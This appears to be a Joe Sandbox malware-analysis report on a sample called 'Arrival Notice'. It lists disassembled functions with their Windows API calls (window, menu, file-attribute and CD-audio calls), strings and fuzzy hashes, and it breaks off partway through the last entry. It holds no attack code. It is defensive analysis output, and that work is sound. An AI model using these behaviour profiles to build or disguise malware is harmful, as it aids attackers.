String ID: blank$info$question$stop$warning
API String ID: 2485277191-404129466
Opcode ID: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
Instruction ID: a4c8356a5cb7371e963c7ba7671977edd7eb5cf64b0a9c0e84f2fcb3e6131cad
Opcode Fuzzy Hash: 90066845996854fde84de619c40f1fe09919dc61d56db525c82daa747bae1459
Instruction Fuzzy Hash: 9121A732B4021566DB00AB65BC05FEF3358DB98762F040837FA05E2282E3A9A52093BD

Function 00454639 Relevance: 25.7, APIs: 17, Instructions: 199windowtimeCOMMON

Download Yara Rule

APIs

LoadIconW.USER32(?,00000063), ref: 0045464C
SendMessageW.USER32(?,00000080,00000000,00000000), ref: 0045465E
SetWindowTextW.USER32(?,?), ref: 00454678
GetDlgItem.USER32(?,000003EA), ref: 00454690
SetWindowTextW.USER32(00000000,?), ref: 00454697
GetDlgItem.USER32(?,000003E9), ref: 004546A8
SetWindowTextW.USER32(00000000,?), ref: 004546AF
SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004546D1
SendDlgItemMessageW.USER32(?,000003E9,000000C5,?,00000000), ref: 004546EB
GetWindowRect.USER32(?,?), ref: 004546F5
SetWindowTextW.USER32(?,?), ref: 00454765
GetDesktopWindow.USER32 ref: 0045476F
GetWindowRect.USER32(00000000), ref: 00454776
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 004547C4
GetClientRect.USER32(?,?), ref: 004547D2
PostMessageW.USER32(?,00000005,00000000,00000080), ref: 004547FC
SetTimer.USER32(?,0000040A,?,00000000), ref: 0045483F

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
String ID:
API String ID: 3869813825-0
Opcode ID: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
Instruction ID: 23cbb84c7db07f79204f7fb68ef1a354279dd66d41dce19f663d7a5246859b32
Opcode Fuzzy Hash: 7299b5a8a54a0497ad48b5c2470d2d1877852c465202323cb5b3bdfcc53dc08d
Instruction Fuzzy Hash: 06619D75A00705ABD720DFA8CE89F6FB7F8AB48705F00491DEA46A7290D778E944CB54

Function 004649A3 Relevance: 24.9, APIs: 13, Strings: 1, Instructions: 395COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00464B28
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B38
GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00464B60
_wcslen.LIBCMT ref: 00464C28
GetCurrentDirectoryW.KERNEL32(00000000,00000000,?), ref: 00464C3C
GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00464C64
_wcslen.LIBCMT ref: 00464CBA
_wcslen.LIBCMT ref: 00464CD0
_wcslen.LIBCMT ref: 00464CEF

Strings

D, xrefs: 004649D0

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: _wcslen$Directory$CurrentSystem
String ID: D
API String ID: 1914653954-2746444292
Opcode ID: e582c214e498576940320affdbb39b983f19030349f56f9343014e7b8f55c96d
Instruction ID: cb0983c86ca1fa87ccea60adda1cf5635047c5df12380c224dcb23d097980814
Opcode Fuzzy Hash: e582c214e498576940320affdbb39b983f19030349f56f9343014e7b8f55c96d
Instruction Fuzzy Hash: 98E101716043409BD710EF65C845B6BB7E4AFC4308F148D2EF98987392EB39E945CB9A

Function 0045CD1E Relevance: 24.7, APIs: 13, Strings: 1, Instructions: 215COMMON

Download Yara Rule

APIs

_wcsncpy.LIBCMT ref: 0045CE39
__wsplitpath.LIBCMT ref: 0045CE78
_wcscat.LIBCMT ref: 0045CE8B
_wcscat.LIBCMT ref: 0045CE9E
GetCurrentDirectoryW.KERNEL32(00000104,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEB2
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,00000104,?), ref: 0045CEC5

Part of subcall function 00433998: GetFileAttributesW.KERNEL32(?), ref: 0043399F

GetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF05
SetFileAttributesW.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF1D
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF2E
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF3F
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CF53
_wcscpy.LIBCMT ref: 0045CF61
SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,?,?,?,?,00000104,?), ref: 0045CFA4

Strings

*.*, xrefs: 0045CF5B

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CurrentDirectory$AttributesFile$_wcscat$__wsplitpath_wcscpy_wcsncpy
String ID: *.*
API String ID: 1153243558-438819550
Opcode ID: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
Instruction ID: eacc2f87ca0c49a88fd160cf35c0ab61f7b8ac52d7ffc0430f804bda47b2a69a
Opcode Fuzzy Hash: 28b8a1e182566b38844f77773a79acdc9f60bea9bca2776be04cde59cc8a5d2f
Instruction Fuzzy Hash: F071D572900208AEDB24DB54CCC5AEEB7B5AB44305F1489ABE805D7242D67C9ECDCB99

Function 0044B98C Relevance: 24.6, APIs: 7, Strings: 7, Instructions: 80COMMON

Download Yara Rule

APIs

__wcsicoll.LIBCMT ref: 0044B9A3
__wcsicoll.LIBCMT ref: 0044B9B9
__wcsicoll.LIBCMT ref: 0044BA50

Strings

MIDDLE, xrefs: 0044BA4A
SECONDARY, xrefs: 0044BA07
MENU, xrefs: 0044B9F5
PRIMARY, xrefs: 0044B9E3
RIGHT, xrefs: 0044B9B3
LEFT, xrefs: 0044B99D
MAIN, xrefs: 0044B9D1

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: __wcsicoll
String ID: LEFT$MAIN$MENU$MIDDLE$PRIMARY$RIGHT$SECONDARY
API String ID: 3832890014-4202584635
Opcode ID: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
Instruction ID: 3b59ed03df0c76d23b576b9f0bbd6b5c96606bf3e4c0b80e5c93e428ec3f30be
Opcode Fuzzy Hash: 95885f1eddacfd63033607ac838e89683eff4e7941016429c0898dbf95f86d61
Instruction Fuzzy Hash: AB117772A4422512E91072657C03BFF219CCF1177AF14487BF90DE5A82FB4EDA9541ED

Function 0046A07E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 253windowCOMMON

Download Yara Rule

APIs

PostMessageW.USER32(?,00000112,0000F060,00000000), ref: 0046A0C9
GetFocus.USER32 ref: 0046A0DD
GetDlgCtrlID.USER32(00000000), ref: 0046A0E8
PostMessageW.USER32(?,00000111,?,00000000), ref: 0046A13C

Strings

0, xrefs: 0046A23F

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessagePost$CtrlFocus
String ID: 0
API String ID: 1534620443-4108050209
Opcode ID: 44486a5aeb11d59bb0643a5d37d795f452b8c762e0e59614718db8fb8d240587
Instruction ID: bf3f5449e9a8ba554bb586fd0597798874618ae7c394ba8af81d11134a55f14d
Opcode Fuzzy Hash: 44486a5aeb11d59bb0643a5d37d795f452b8c762e0e59614718db8fb8d240587
Instruction Fuzzy Hash: 9791AD71604711AFE710CF14D884BABB7A4FB85314F004A1EF991A7381E7B9D895CBAB

Function 004557E0 Relevance: 23.0, APIs: 11, Strings: 2, Instructions: 220COMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?), ref: 004558E3
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00400000,00000000), ref: 0045592C

Strings

tooltips_class32, xrefs: 00455925, 00455A04
,, xrefs: 0045588B

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Window$CreateDestroy
String ID: ,$tooltips_class32
API String ID: 1109047481-3856767331
Opcode ID: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
Instruction ID: 3e2a402d8ef05c983ab6a33f0f0d51d253aadf8c8a2d9d50fdabec1795fb524a
Opcode Fuzzy Hash: ae2d9903759a545ce0c494cdefa096f9672d9422e9f4a365a31b4f6ccc33a5ca
Instruction Fuzzy Hash: AE71AD71650208AFE720CF58DC84FBA77B8FB59310F20851AFD45AB391DA74AD46CB98

Function 00468B0E Relevance: 23.0, APIs: 12, Strings: 1, Instructions: 207windowCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,00000007,00000000,00000030), ref: 00468BB1
GetMenuItemCount.USER32(?), ref: 00468C45
DeleteMenu.USER32(?,00000005,00000000,?,?,?), ref: 00468CD9
DeleteMenu.USER32(?,00000004,00000000,?,?), ref: 00468CE2
DeleteMenu.USER32(00000000,00000006,00000000,?,00000004,00000000,?,?), ref: 00468CEB
DeleteMenu.USER32(?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468CF4
GetMenuItemCount.USER32 ref: 00468CFD
SetMenuItemInfoW.USER32(?,00000004,00000000,00000030), ref: 00468D35
GetCursorPos.USER32(?), ref: 00468D3F
SetForegroundWindow.USER32(?), ref: 00468D49
TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000,?,?,00000003,00000000,?,00000004,00000000,?,?), ref: 00468D5F
PostMessageW.USER32(?,00000000,00000000,00000000), ref: 00468D6C

Strings

0, xrefs: 00468B22

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: Menu$DeleteItem$CountInfo$CursorForegroundMessagePopupPostTrackWindow
String ID: 0
API String ID: 1441871840-4108050209
Opcode ID: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
Instruction ID: 6d2915cdebcc0779354c8c01805c07fba6dcd836026253be2713676dcba25ca6
Opcode Fuzzy Hash: 07587df8a471d518792fccb5aa1665f6bc623426d2a925fe0db1080b86145506
Instruction Fuzzy Hash: F571A0B0644300BBE720DB58CC45F5AB7A4AF85724F20470EF5656B3D1DBB8B8448B2A

Function 00460879 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 136windowCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000066,?,00000FFF,00000010,00000001,?,?,00427F75,?,0000138C,?,00000001,?,?,?), ref: 004608A9
LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608B0

Part of subcall function 00401B10: _wcslen.LIBCMT ref: 00401B11
Part of subcall function 00401B10: _memmove.LIBCMT ref: 00401B57

GetModuleHandleW.KERNEL32(00000000,?,?,00000FFF,?,00427F75,?,0000138C,?,00000001,?,?,?,?,?,00000000), ref: 004608D0
LoadStringW.USER32(00000000,?,00427F75,?), ref: 004608D7
__swprintf.LIBCMT ref: 00460915
__swprintf.LIBCMT ref: 0046092D
_wprintf.LIBCMT ref: 004609E1
MessageBoxW.USER32(00000000,?,?,00011010), ref: 004609FA

Strings

^ ERROR, xrefs: 00460983
%s (%d) : ==> %s: %s %s, xrefs: 004609DC
Line %d:, xrefs: 0046090F
Error: , xrefs: 004609AC
Line %d (File "%s"):, xrefs: 00460927

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: HandleLoadModuleString__swprintf$Message_memmove_wcslen_wprintf
String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
API String ID: 3631882475-2268648507
Opcode ID: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
Instruction ID: 03c51728676f919c2e33c8c13cfd5c1cee97c3d48cab2dbcdd3400b30208eb52
Opcode Fuzzy Hash: fa3f6862133619af0c8d91bc8d1f7a2e71e3d76ca5879c2374ca29fe6f13d18d
Instruction Fuzzy Hash: F5416071900209ABDB00FB91CD46AEF7778AF44314F44447AF50577192EA786E45CBA9

Function 004716B8 Relevance: 22.7, APIs: 15, Instructions: 179windowCOMMON

Download Yara Rule

APIs

ExtractIconExW.SHELL32(?,?,?,?,00000001), ref: 004716C7
ExtractIconExW.SHELL32(?,000000FF,?,?,00000001), ref: 004716E1
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00471711
SendMessageW.USER32 ref: 00471740
ImageList_Create.COMCTL32(00000010,00000010,00000021,?,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 00471779
SendMessageW.USER32(?,00001003,00000001,00000000), ref: 0047179A
ImageList_Create.COMCTL32(00000020,00000020,00000021,00000000,00000001,?,?,?,?,?,?,?,?,?,?,00001053), ref: 004717B0
SendMessageW.USER32(?,00001003,00000000,00000000), ref: 004717D3
ImageList_ReplaceIcon.COMCTL32(?,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004717F8
ImageList_ReplaceIcon.COMCTL32(00000000,000000FF,?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 00471807
SendMessageW.USER32 ref: 0047184F
SendMessageW.USER32(?,0000104C,00000000,00000002), ref: 00471872
SendMessageW.USER32(?,00001015,00000000,00000000), ref: 00471890
DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 0047189C
DestroyIcon.USER32(?,?,?,?,?,?,?,?,?,?,?,00001053,000000FF,?), ref: 004718A2

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: MessageSend$Icon$ImageList_$CreateDestroyExtractReplace
String ID:
API String ID: 4116747274-0
Opcode ID: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
Instruction ID: aa77b4eb3e0d334a4980849760fe45b072e458157f6a66894e70986bfe60c355
Opcode Fuzzy Hash: 0980e37b37b59800b468ddf3c96ce45e1e3e21a553a40365caf2b501cbb695b2
Instruction Fuzzy Hash: 39617D75A00209AFEB10DF68CD85FEEB7B4FB48710F10855AF618AB2D0D7B4A981CB54

Function 0046163E Relevance: 21.3, APIs: 11, Strings: 1, Instructions: 294windowtimeCOMMON

Download Yara Rule

APIs

GetClassNameW.USER32(?,?,00000100), ref: 00461678
_wcslen.LIBCMT ref: 00461683
__swprintf.LIBCMT ref: 00461721
SendMessageTimeoutW.USER32(?,?,00000101,00000000,00000002,00001388,?), ref: 00461794
GetClassNameW.USER32(?,?,00000400), ref: 00461811
GetDlgCtrlID.USER32(?), ref: 00461869
GetWindowRect.USER32(?,?), ref: 004618A4
GetParent.USER32(?), ref: 004618C3
ScreenToClient.USER32(00000000), ref: 004618CA
GetClassNameW.USER32(?,?,00000100), ref: 00461941
GetWindowTextW.USER32(?,?,00000400), ref: 0046197E

Strings

%s%u, xrefs: 0046171B

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: ClassName$Window$ClientCtrlMessageParentRectScreenSendTextTimeout__swprintf_wcslen
String ID: %s%u
API String ID: 1899580136-679674701
Opcode ID: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
Instruction ID: 362d1c13b2509f288ecdbc272899e32e1bd8f20a7ba75cfa55bfcaf2deda5cb5
Opcode Fuzzy Hash: 766f23a74968ff95f09f311a42cbe987384f70ffc1712f5abd724c40a01aa324
Instruction Fuzzy Hash: 1DA1B2715043019FDB10DF55C884BAB73A8FF84314F08896EFD899B255E738E94ACBA6

Function 0045FD57 Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 227windowsleepCOMMON

Download Yara Rule

APIs

GetMenuItemInfoW.USER32(?,FFFFFFFF,00000000,00000030), ref: 0045FDDB
SetMenuItemInfoW.USER32(00000008,00000004,00000000,00000030), ref: 0045FE14
Sleep.KERNEL32(000001F4,?,FFFFFFFF,00000000,00000030,?,?,?,?,?,?), ref: 0045FE26

Strings

0, xrefs: 0045FD6E

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: InfoItemMenu$Sleep
String ID: 0
API String ID: 1196289194-4108050209
Opcode ID: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
Instruction ID: 163fe6e236f433162160dce37f71c375d73f8c96772172175a1e07f10d517f7e
Opcode Fuzzy Hash: 5de70b745d60c46cef08f56f1a5c3a55b51ac4f0ed049d1ad5198b842cd33ee8
Instruction Fuzzy Hash: 12710172500244ABDB20CF55EC49FAFBBA8EB95316F00842FFD0197292C374A94DCB69

Function 004313CA Relevance: 21.2, APIs: 11, Strings: 1, Instructions: 160windowCOMMON

Download Yara Rule

APIs

GetDC.USER32(00000000), ref: 0043143E
CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 0043144F
CreateCompatibleDC.GDI32(00000000), ref: 00431459
SelectObject.GDI32(00000000,?), ref: 00431466
StretchBlt.GDI32(00000000,00000000,00000000,?,?,?,?,?,?,?,00CC0020), ref: 004314CC
GetDIBits.GDI32(00000000,?,00000000,00000000,00000000,?,00000000), ref: 00431505

Strings

(, xrefs: 004314ED

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.0000000000492000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277997236.00000000004A7000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1278033240.00000000004AB000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_Arrival Notice.jbxd

Similarity

API ID: CompatibleCreate$BitmapBitsObjectSelectStretch
String ID: (
API String ID: 3300687185-3887548279
Opcode ID: 8b9fc93d41908474716197757958ef270abb238abb340e32d56b7e74e1666973
Instruction ID: 70523424e9a4c52fdd53d867b9eeb1eac2d89839f103c71a78559f5a5eece38f
Opcode Fuzzy Hash: 8b9fc93d41908474716197757958ef270abb238abb340e32d56b7e74e1666973
Instruction Fuzzy Hash: 63514971A00209AFDB14CF98C884FAFBBB8EF49310F10891DFA5997290D774A940CBA4

Function 0045DA73 Relevance: 21.1, APIs: 4, Strings: 8, Instructions: 141COMMON

Download Yara Rule

APIs

Part of subcall function 004536F7: CharLowerBuffW.USER32(?,?), ref: 0045370C

Part of subcall function 00445AE0: _wcslen.LIBCMT ref: 00445AF0

GetDriveTypeW.KERNEL32 ref: 0045DB32
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DB78
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBB3
mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 0045DBED

Part of subcall function 00402160: _wcslen.LIBCMT ref: 0040216D
Part of subcall function 00402160: _memmove.LIBCMT ref: 00402193

Strings

wait, xrefs: 0045DB9A
open, xrefs: 0045DB05
type cdaudio alias cd wait, xrefs: 0045DB5B
open , xrefs: 0045DB41
close, xrefs: 0045DAE1
close cd wait, xrefs: 0045DBD4
closed, xrefs: 0045DAF3, 0045DB1B
set cd door , xrefs: 0045DB7E

Memory Dump Source

Source File: 00000000.00000002.1277886671.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1277870786.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277944148.0000000000482000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277961228.0000000000490000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1277979550.0000000000491000.00000008.00000001.01000000.00000003.sdmpDownload File
